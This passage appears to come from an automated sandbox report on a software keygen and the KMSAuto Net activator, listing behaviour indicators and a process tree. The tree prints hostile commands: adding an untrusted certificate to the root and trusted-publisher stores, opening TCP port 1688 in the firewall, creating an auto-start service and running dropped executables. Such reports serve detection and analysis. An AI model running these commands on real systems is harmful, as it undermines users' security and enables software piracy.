6792	regedit.exe
7352	regedit.exe

pid	process
4664	PING.EXE
4940	PING.EXE
1340	PING.EXE
5872	PING.EXE
8088	PING.EXE
6488	PING.EXE
4088	PING.EXE
4440	PING.EXE

Script User-Agent 19 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	298	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	643	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	648	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	893	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	165	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	176	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	340	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	353	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	357	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	390	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	185	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	596	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	934	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	945	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	187	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	303	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	601	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	696	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	739	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

KMSAuto Net.exeSppExtComObjPatcher.exe1615303685562.exe1615303690109.exefile.exemultitimer.exe1615303696450.exemultitimer.exe

pid	process
812	KMSAuto Net.exe
812	KMSAuto Net.exe
812	KMSAuto Net.exe
812	KMSAuto Net.exe
812	KMSAuto Net.exe
812	KMSAuto Net.exe
812	KMSAuto Net.exe
812	KMSAuto Net.exe
812	KMSAuto Net.exe
812	KMSAuto Net.exe
812	KMSAuto Net.exe
2780	SppExtComObjPatcher.exe
2780	SppExtComObjPatcher.exe
2780	SppExtComObjPatcher.exe
2780	SppExtComObjPatcher.exe
2780	SppExtComObjPatcher.exe
2780	SppExtComObjPatcher.exe
4404	1615303685562.exe
4404	1615303685562.exe
4604	1615303690109.exe
4604	1615303690109.exe
4592	file.exe
4592	file.exe
4304	multitimer.exe
4304	multitimer.exe
4780	1615303696450.exe
4780	1615303696450.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4304	multitimer.exe
4768	multitimer.exe
4768	multitimer.exe
4768	multitimer.exe

Suspicious behavior: LoadsDriver 7 IoCs

Processes:

pid process

612
612
612
612
612
612
612

pid	process
612
612
612
612
612
612
612

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AUDIODG.EXENETSTAT.EXEKMSAuto Net.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeNETSTAT.EXEtaskkill.exetaskkill.exemsiexec.exemsiexec.exe

description	pid	process
Token: 33	1972	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1972	AUDIODG.EXE
Token: SeDebugPrivilege	688	NETSTAT.EXE
Token: SeDebugPrivilege	812	KMSAuto Net.exe
Token: SeDebugPrivilege	3512	taskkill.exe
Token: SeDebugPrivilege	4024	taskkill.exe
Token: SeDebugPrivilege	1836	taskkill.exe
Token: SeDebugPrivilege	4032	taskkill.exe
Token: SeDebugPrivilege	2192	taskkill.exe
Token: SeDebugPrivilege	3560	taskkill.exe
Token: SeDebugPrivilege	3372	taskkill.exe
Token: SeDebugPrivilege	2200	taskkill.exe
Token: SeDebugPrivilege	2784	taskkill.exe
Token: SeDebugPrivilege	3132	taskkill.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	1216	NETSTAT.EXE
Token: SeDebugPrivilege	3728	taskkill.exe
Token: SeDebugPrivilege	4020	taskkill.exe
Token: SeShutdownPrivilege	4420	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4420	msiexec.exe
Token: SeSecurityPrivilege	4488	msiexec.exe
Token: SeCreateTokenPrivilege	4420	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4420	msiexec.exe
Token: SeLockMemoryPrivilege	4420	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4420	msiexec.exe
Token: SeMachineAccountPrivilege	4420	msiexec.exe
Token: SeTcbPrivilege	4420	msiexec.exe
Token: SeSecurityPrivilege	4420	msiexec.exe
Token: SeTakeOwnershipPrivilege	4420	msiexec.exe
Token: SeLoadDriverPrivilege	4420	msiexec.exe
Token: SeSystemProfilePrivilege	4420	msiexec.exe
Token: SeSystemtimePrivilege	4420	msiexec.exe
Token: SeProfSingleProcessPrivilege	4420	msiexec.exe
Token: SeIncBasePriorityPrivilege	4420	msiexec.exe
Token: SeCreatePagefilePrivilege	4420	msiexec.exe
Token: SeCreatePermanentPrivilege	4420	msiexec.exe
Token: SeBackupPrivilege	4420	msiexec.exe
Token: SeRestorePrivilege	4420	msiexec.exe
Token: SeShutdownPrivilege	4420	msiexec.exe
Token: SeDebugPrivilege	4420	msiexec.exe
Token: SeAuditPrivilege	4420	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4420	msiexec.exe
Token: SeChangeNotifyPrivilege	4420	msiexec.exe
Token: SeRemoteShutdownPrivilege	4420	msiexec.exe
Token: SeUndockPrivilege	4420	msiexec.exe
Token: SeSyncAgentPrivilege	4420	msiexec.exe
Token: SeEnableDelegationPrivilege	4420	msiexec.exe
Token: SeManageVolumePrivilege	4420	msiexec.exe
Token: SeImpersonatePrivilege	4420	msiexec.exe
Token: SeCreateGlobalPrivilege	4420	msiexec.exe
Token: SeCreateTokenPrivilege	4420	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4420	msiexec.exe
Token: SeLockMemoryPrivilege	4420	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4420	msiexec.exe
Token: SeMachineAccountPrivilege	4420	msiexec.exe
Token: SeTcbPrivilege	4420	msiexec.exe
Token: SeSecurityPrivilege	4420	msiexec.exe
Token: SeTakeOwnershipPrivilege	4420	msiexec.exe
Token: SeLoadDriverPrivilege	4420	msiexec.exe
Token: SeSystemProfilePrivilege	4420	msiexec.exe
Token: SeSystemtimePrivilege	4420	msiexec.exe
Token: SeProfSingleProcessPrivilege	4420	msiexec.exe
Token: SeIncBasePriorityPrivilege	4420	msiexec.exe
Token: SeCreatePagefilePrivilege	4420	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

msiexec.exe

pid process

4420 msiexec.exe

pid	process
4420	msiexec.exe

Suspicious use of SetWindowsHookEx 25 IoCs

Processes:

Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exewzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datwzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datSppPatcher_x64.dat

pid	process
628	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
628	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
3588	wzt.dat
3300	certmgr.exe
2132	certmgr.exe
3912	bin.dat
2804	AESDecoder.exe
2976	bin_x64.dat
1356	bin_x64.dat
212	bin_x64.dat
2064	bin_x64.dat
688	bin_x64.dat
1608	bin_x64.dat
488	bin_x64.dat
2524	bin_x64.dat
880	bin_x64.dat
2252	bin_x64.dat
3468	bin_x64.dat
3160	wzt.dat
3176	certmgr.exe
3884	certmgr.exe
2028	bin.dat
904	AESDecoder.exe
1444	bin_x64.dat
2184	SppPatcher_x64.dat

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

KMSAuto Net.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 812 wrote to memory of 3932	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 3932	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 3932	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 2064	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 2064	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 3460	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 3460	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 204	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 204	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 740	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 740	812	KMSAuto Net.exe	cmd.exe
PID 740 wrote to memory of 3588	740	cmd.exe	wzt.dat
PID 740 wrote to memory of 3588	740	cmd.exe	wzt.dat
PID 740 wrote to memory of 3588	740	cmd.exe	wzt.dat
PID 812 wrote to memory of 3000	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 3000	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 1412	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 1412	812	KMSAuto Net.exe	cmd.exe
PID 1412 wrote to memory of 3300	1412	cmd.exe	certmgr.exe
PID 1412 wrote to memory of 3300	1412	cmd.exe	certmgr.exe
PID 1412 wrote to memory of 3300	1412	cmd.exe	certmgr.exe
PID 812 wrote to memory of 4016	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 4016	812	KMSAuto Net.exe	cmd.exe
PID 4016 wrote to memory of 2132	4016	cmd.exe	certmgr.exe
PID 4016 wrote to memory of 2132	4016	cmd.exe	certmgr.exe
PID 4016 wrote to memory of 2132	4016	cmd.exe	certmgr.exe
PID 812 wrote to memory of 748	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 748	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 1152	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 1152	812	KMSAuto Net.exe	cmd.exe
PID 1152 wrote to memory of 3912	1152	cmd.exe	bin.dat
PID 1152 wrote to memory of 3912	1152	cmd.exe	bin.dat
PID 1152 wrote to memory of 3912	1152	cmd.exe	bin.dat
PID 812 wrote to memory of 2084	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 2084	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 3132	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 3132	812	KMSAuto Net.exe	cmd.exe
PID 3132 wrote to memory of 2804	3132	cmd.exe	AESDecoder.exe
PID 3132 wrote to memory of 2804	3132	cmd.exe	AESDecoder.exe
PID 3132 wrote to memory of 2804	3132	cmd.exe	AESDecoder.exe
PID 812 wrote to memory of 3728	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 3728	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 1532	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 1532	812	KMSAuto Net.exe	cmd.exe
PID 1532 wrote to memory of 2976	1532	cmd.exe	bin_x64.dat
PID 1532 wrote to memory of 2976	1532	cmd.exe	bin_x64.dat
PID 1532 wrote to memory of 2976	1532	cmd.exe	bin_x64.dat
PID 812 wrote to memory of 4024	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 4024	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 1836	812	KMSAuto Net.exe	cmd.exe
PID 812 wrote to memory of 1836	812	KMSAuto Net.exe	cmd.exe
PID 1836 wrote to memory of 4016	1836	cmd.exe	cmd.exe
PID 1836 wrote to memory of 4016	1836	cmd.exe	cmd.exe
PID 4016 wrote to memory of 688	4016	cmd.exe	NETSTAT.EXE
PID 4016 wrote to memory of 688	4016	cmd.exe	NETSTAT.EXE
PID 4016 wrote to memory of 1480	4016	cmd.exe	find.exe
PID 4016 wrote to memory of 1480	4016	cmd.exe	find.exe
PID 812 wrote to memory of 3984	812	KMSAuto Net.exe	Netsh.exe
PID 812 wrote to memory of 3984	812	KMSAuto Net.exe	Netsh.exe
PID 812 wrote to memory of 488	812	KMSAuto Net.exe	Netsh.exe
PID 812 wrote to memory of 488	812	KMSAuto Net.exe	Netsh.exe
PID 812 wrote to memory of 200	812	KMSAuto Net.exe	sc.exe
PID 812 wrote to memory of 200	812	KMSAuto Net.exe	sc.exe
PID 812 wrote to memory of 200	812	KMSAuto Net.exe	sc.exe

C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
"C:\Users\Admin\AppData\Local\Temp\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:628

C:\Users\Admin\Desktop\KMSAuto Net.exe
"C:\Users\Admin\Desktop\KMSAuto Net.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\SysWOW64\cmd.exe
cmd /c md "C:\Users\Admin\AppData\Local\MSfree Inc"
2⤵
PID:3932

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /c echo test>>"C:\Users\Admin\Desktop\test.test"
2⤵
PID:2064

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"
2⤵
PID:3460

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c md "C:\ProgramData\KMSAuto"
2⤵
PID:204

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c wzt.dat -y -pkmsauto
2⤵
- Suspicious use of WriteProcessMemory
PID:740

C:\ProgramData\KMSAuto\wzt.dat
wzt.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3588

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "wzt.dat"
2⤵
PID:3000

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
2⤵
- Suspicious use of WriteProcessMemory
PID:1412

C:\ProgramData\KMSAuto\wzt\certmgr.exe
certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine ROOT
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:3300

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
2⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\ProgramData\KMSAuto\wzt\certmgr.exe
certmgr.exe -add wzteam.cer -n wzteam -s -r localMachine TRUSTEDPUBLISHER
3⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:2132

C:\Windows\System32\cmd.exe
"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto\wzt" /S /Q
2⤵
PID:748

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin.dat -y -pkmsauto
2⤵
- Suspicious use of WriteProcessMemory
PID:1152

C:\ProgramData\KMSAuto\bin.dat
bin.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3912

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin.dat"
2⤵
PID:2084

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c AESDecoder.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3132

C:\ProgramData\KMSAuto\bin\AESDecoder.exe
AESDecoder.exe
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2804

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "AESDecoder.exe"
2⤵
PID:3728

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
- Suspicious use of WriteProcessMemory
PID:1532

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2976

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:4024

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c for /f "tokens=5 delims=, " %i in ('netstat -ano ^| find ":1688 "') do taskkill /pid %i /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netstat -ano | find ":1688 "
3⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\system32\NETSTAT.EXE
netstat -ano
4⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:688

C:\Windows\system32\find.exe
find ":1688 "
4⤵
PID:1480

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP
2⤵
PID:3984

C:\Windows\System32\Netsh.exe
C:\Windows\Sysnative\Netsh Advfirewall Firewall add rule name="0pen Port KMS" dir=in action=allow protocol=TCP localport=1688
2⤵
PID:488

C:\Windows\SysWOW64\sc.exe
"sc.exe" create KMSEmulator binpath= temp.exe type= own start= auto
2⤵
PID:200

C:\Windows\SysWOW64\sc.exe
"sc.exe" start KMSEmulator
2⤵
PID:2684

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:3276

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1356

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2120

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:4016

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:2200

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:880

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:2848

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:2228

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:2792

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3512

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:2196

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:1800

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:1480

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:212

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:3928

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:3984

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:720

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:2212

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:3524

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:3692

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:3548

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:932

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4024

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:3276

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:3980

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:904

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2064

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:1468

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:804

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:1472

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:3608

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2184

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:2652

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:1220

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3960

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1836

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:3716

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:2872

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:1000

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:688

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:3808

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:2388

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:3380

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:744

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3608

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:1556

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:3564

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:2652

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4032

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:3860

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:1348

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:2524

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1608

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:1000

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:3808

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:2536

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:2388

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2028

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:744

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:1220

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:1556

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2192

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:3148

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:3056

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:2252

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:488

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "bin_x64.dat"
2⤵
PID:2268

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route -p add 100.100.0.10 0.0.0.0 IF 1
2⤵
PID:3576

C:\Windows\system32\ROUTE.EXE
route -p add 100.100.0.10 0.0.0.0 IF 1
3⤵
PID:2372

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c FakeClient.exe 100.100.0.10
2⤵
PID:2780

C:\ProgramData\KMSAuto\bin\driver\x64WDV\FakeClient.exe
FakeClient.exe 100.100.0.10
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:3828

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c route delete 100.100.0.10 0.0.0.0
2⤵
PID:3812

C:\Windows\system32\ROUTE.EXE
route delete 100.100.0.10 0.0.0.0
3⤵
PID:2968

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c taskkill /t /f /IM FakeClient.exe
2⤵
PID:3384

C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /IM FakeClient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3560

C:\Windows\SysWOW64\sc.exe
"sc.exe" stop WinDivert1.1
2⤵
PID:1480

C:\Windows\SysWOW64\sc.exe
"sc.exe" delete WinDivert1.1
2⤵
PID:3936

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /D /c bin_x64.dat -y -pkmsauto
2⤵
PID:1264

C:\ProgramData\KMSAuto\bin_x64.dat
bin_x64.dat -y -pkmsauto
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2524

C:\Windows\System32\cmd.exe
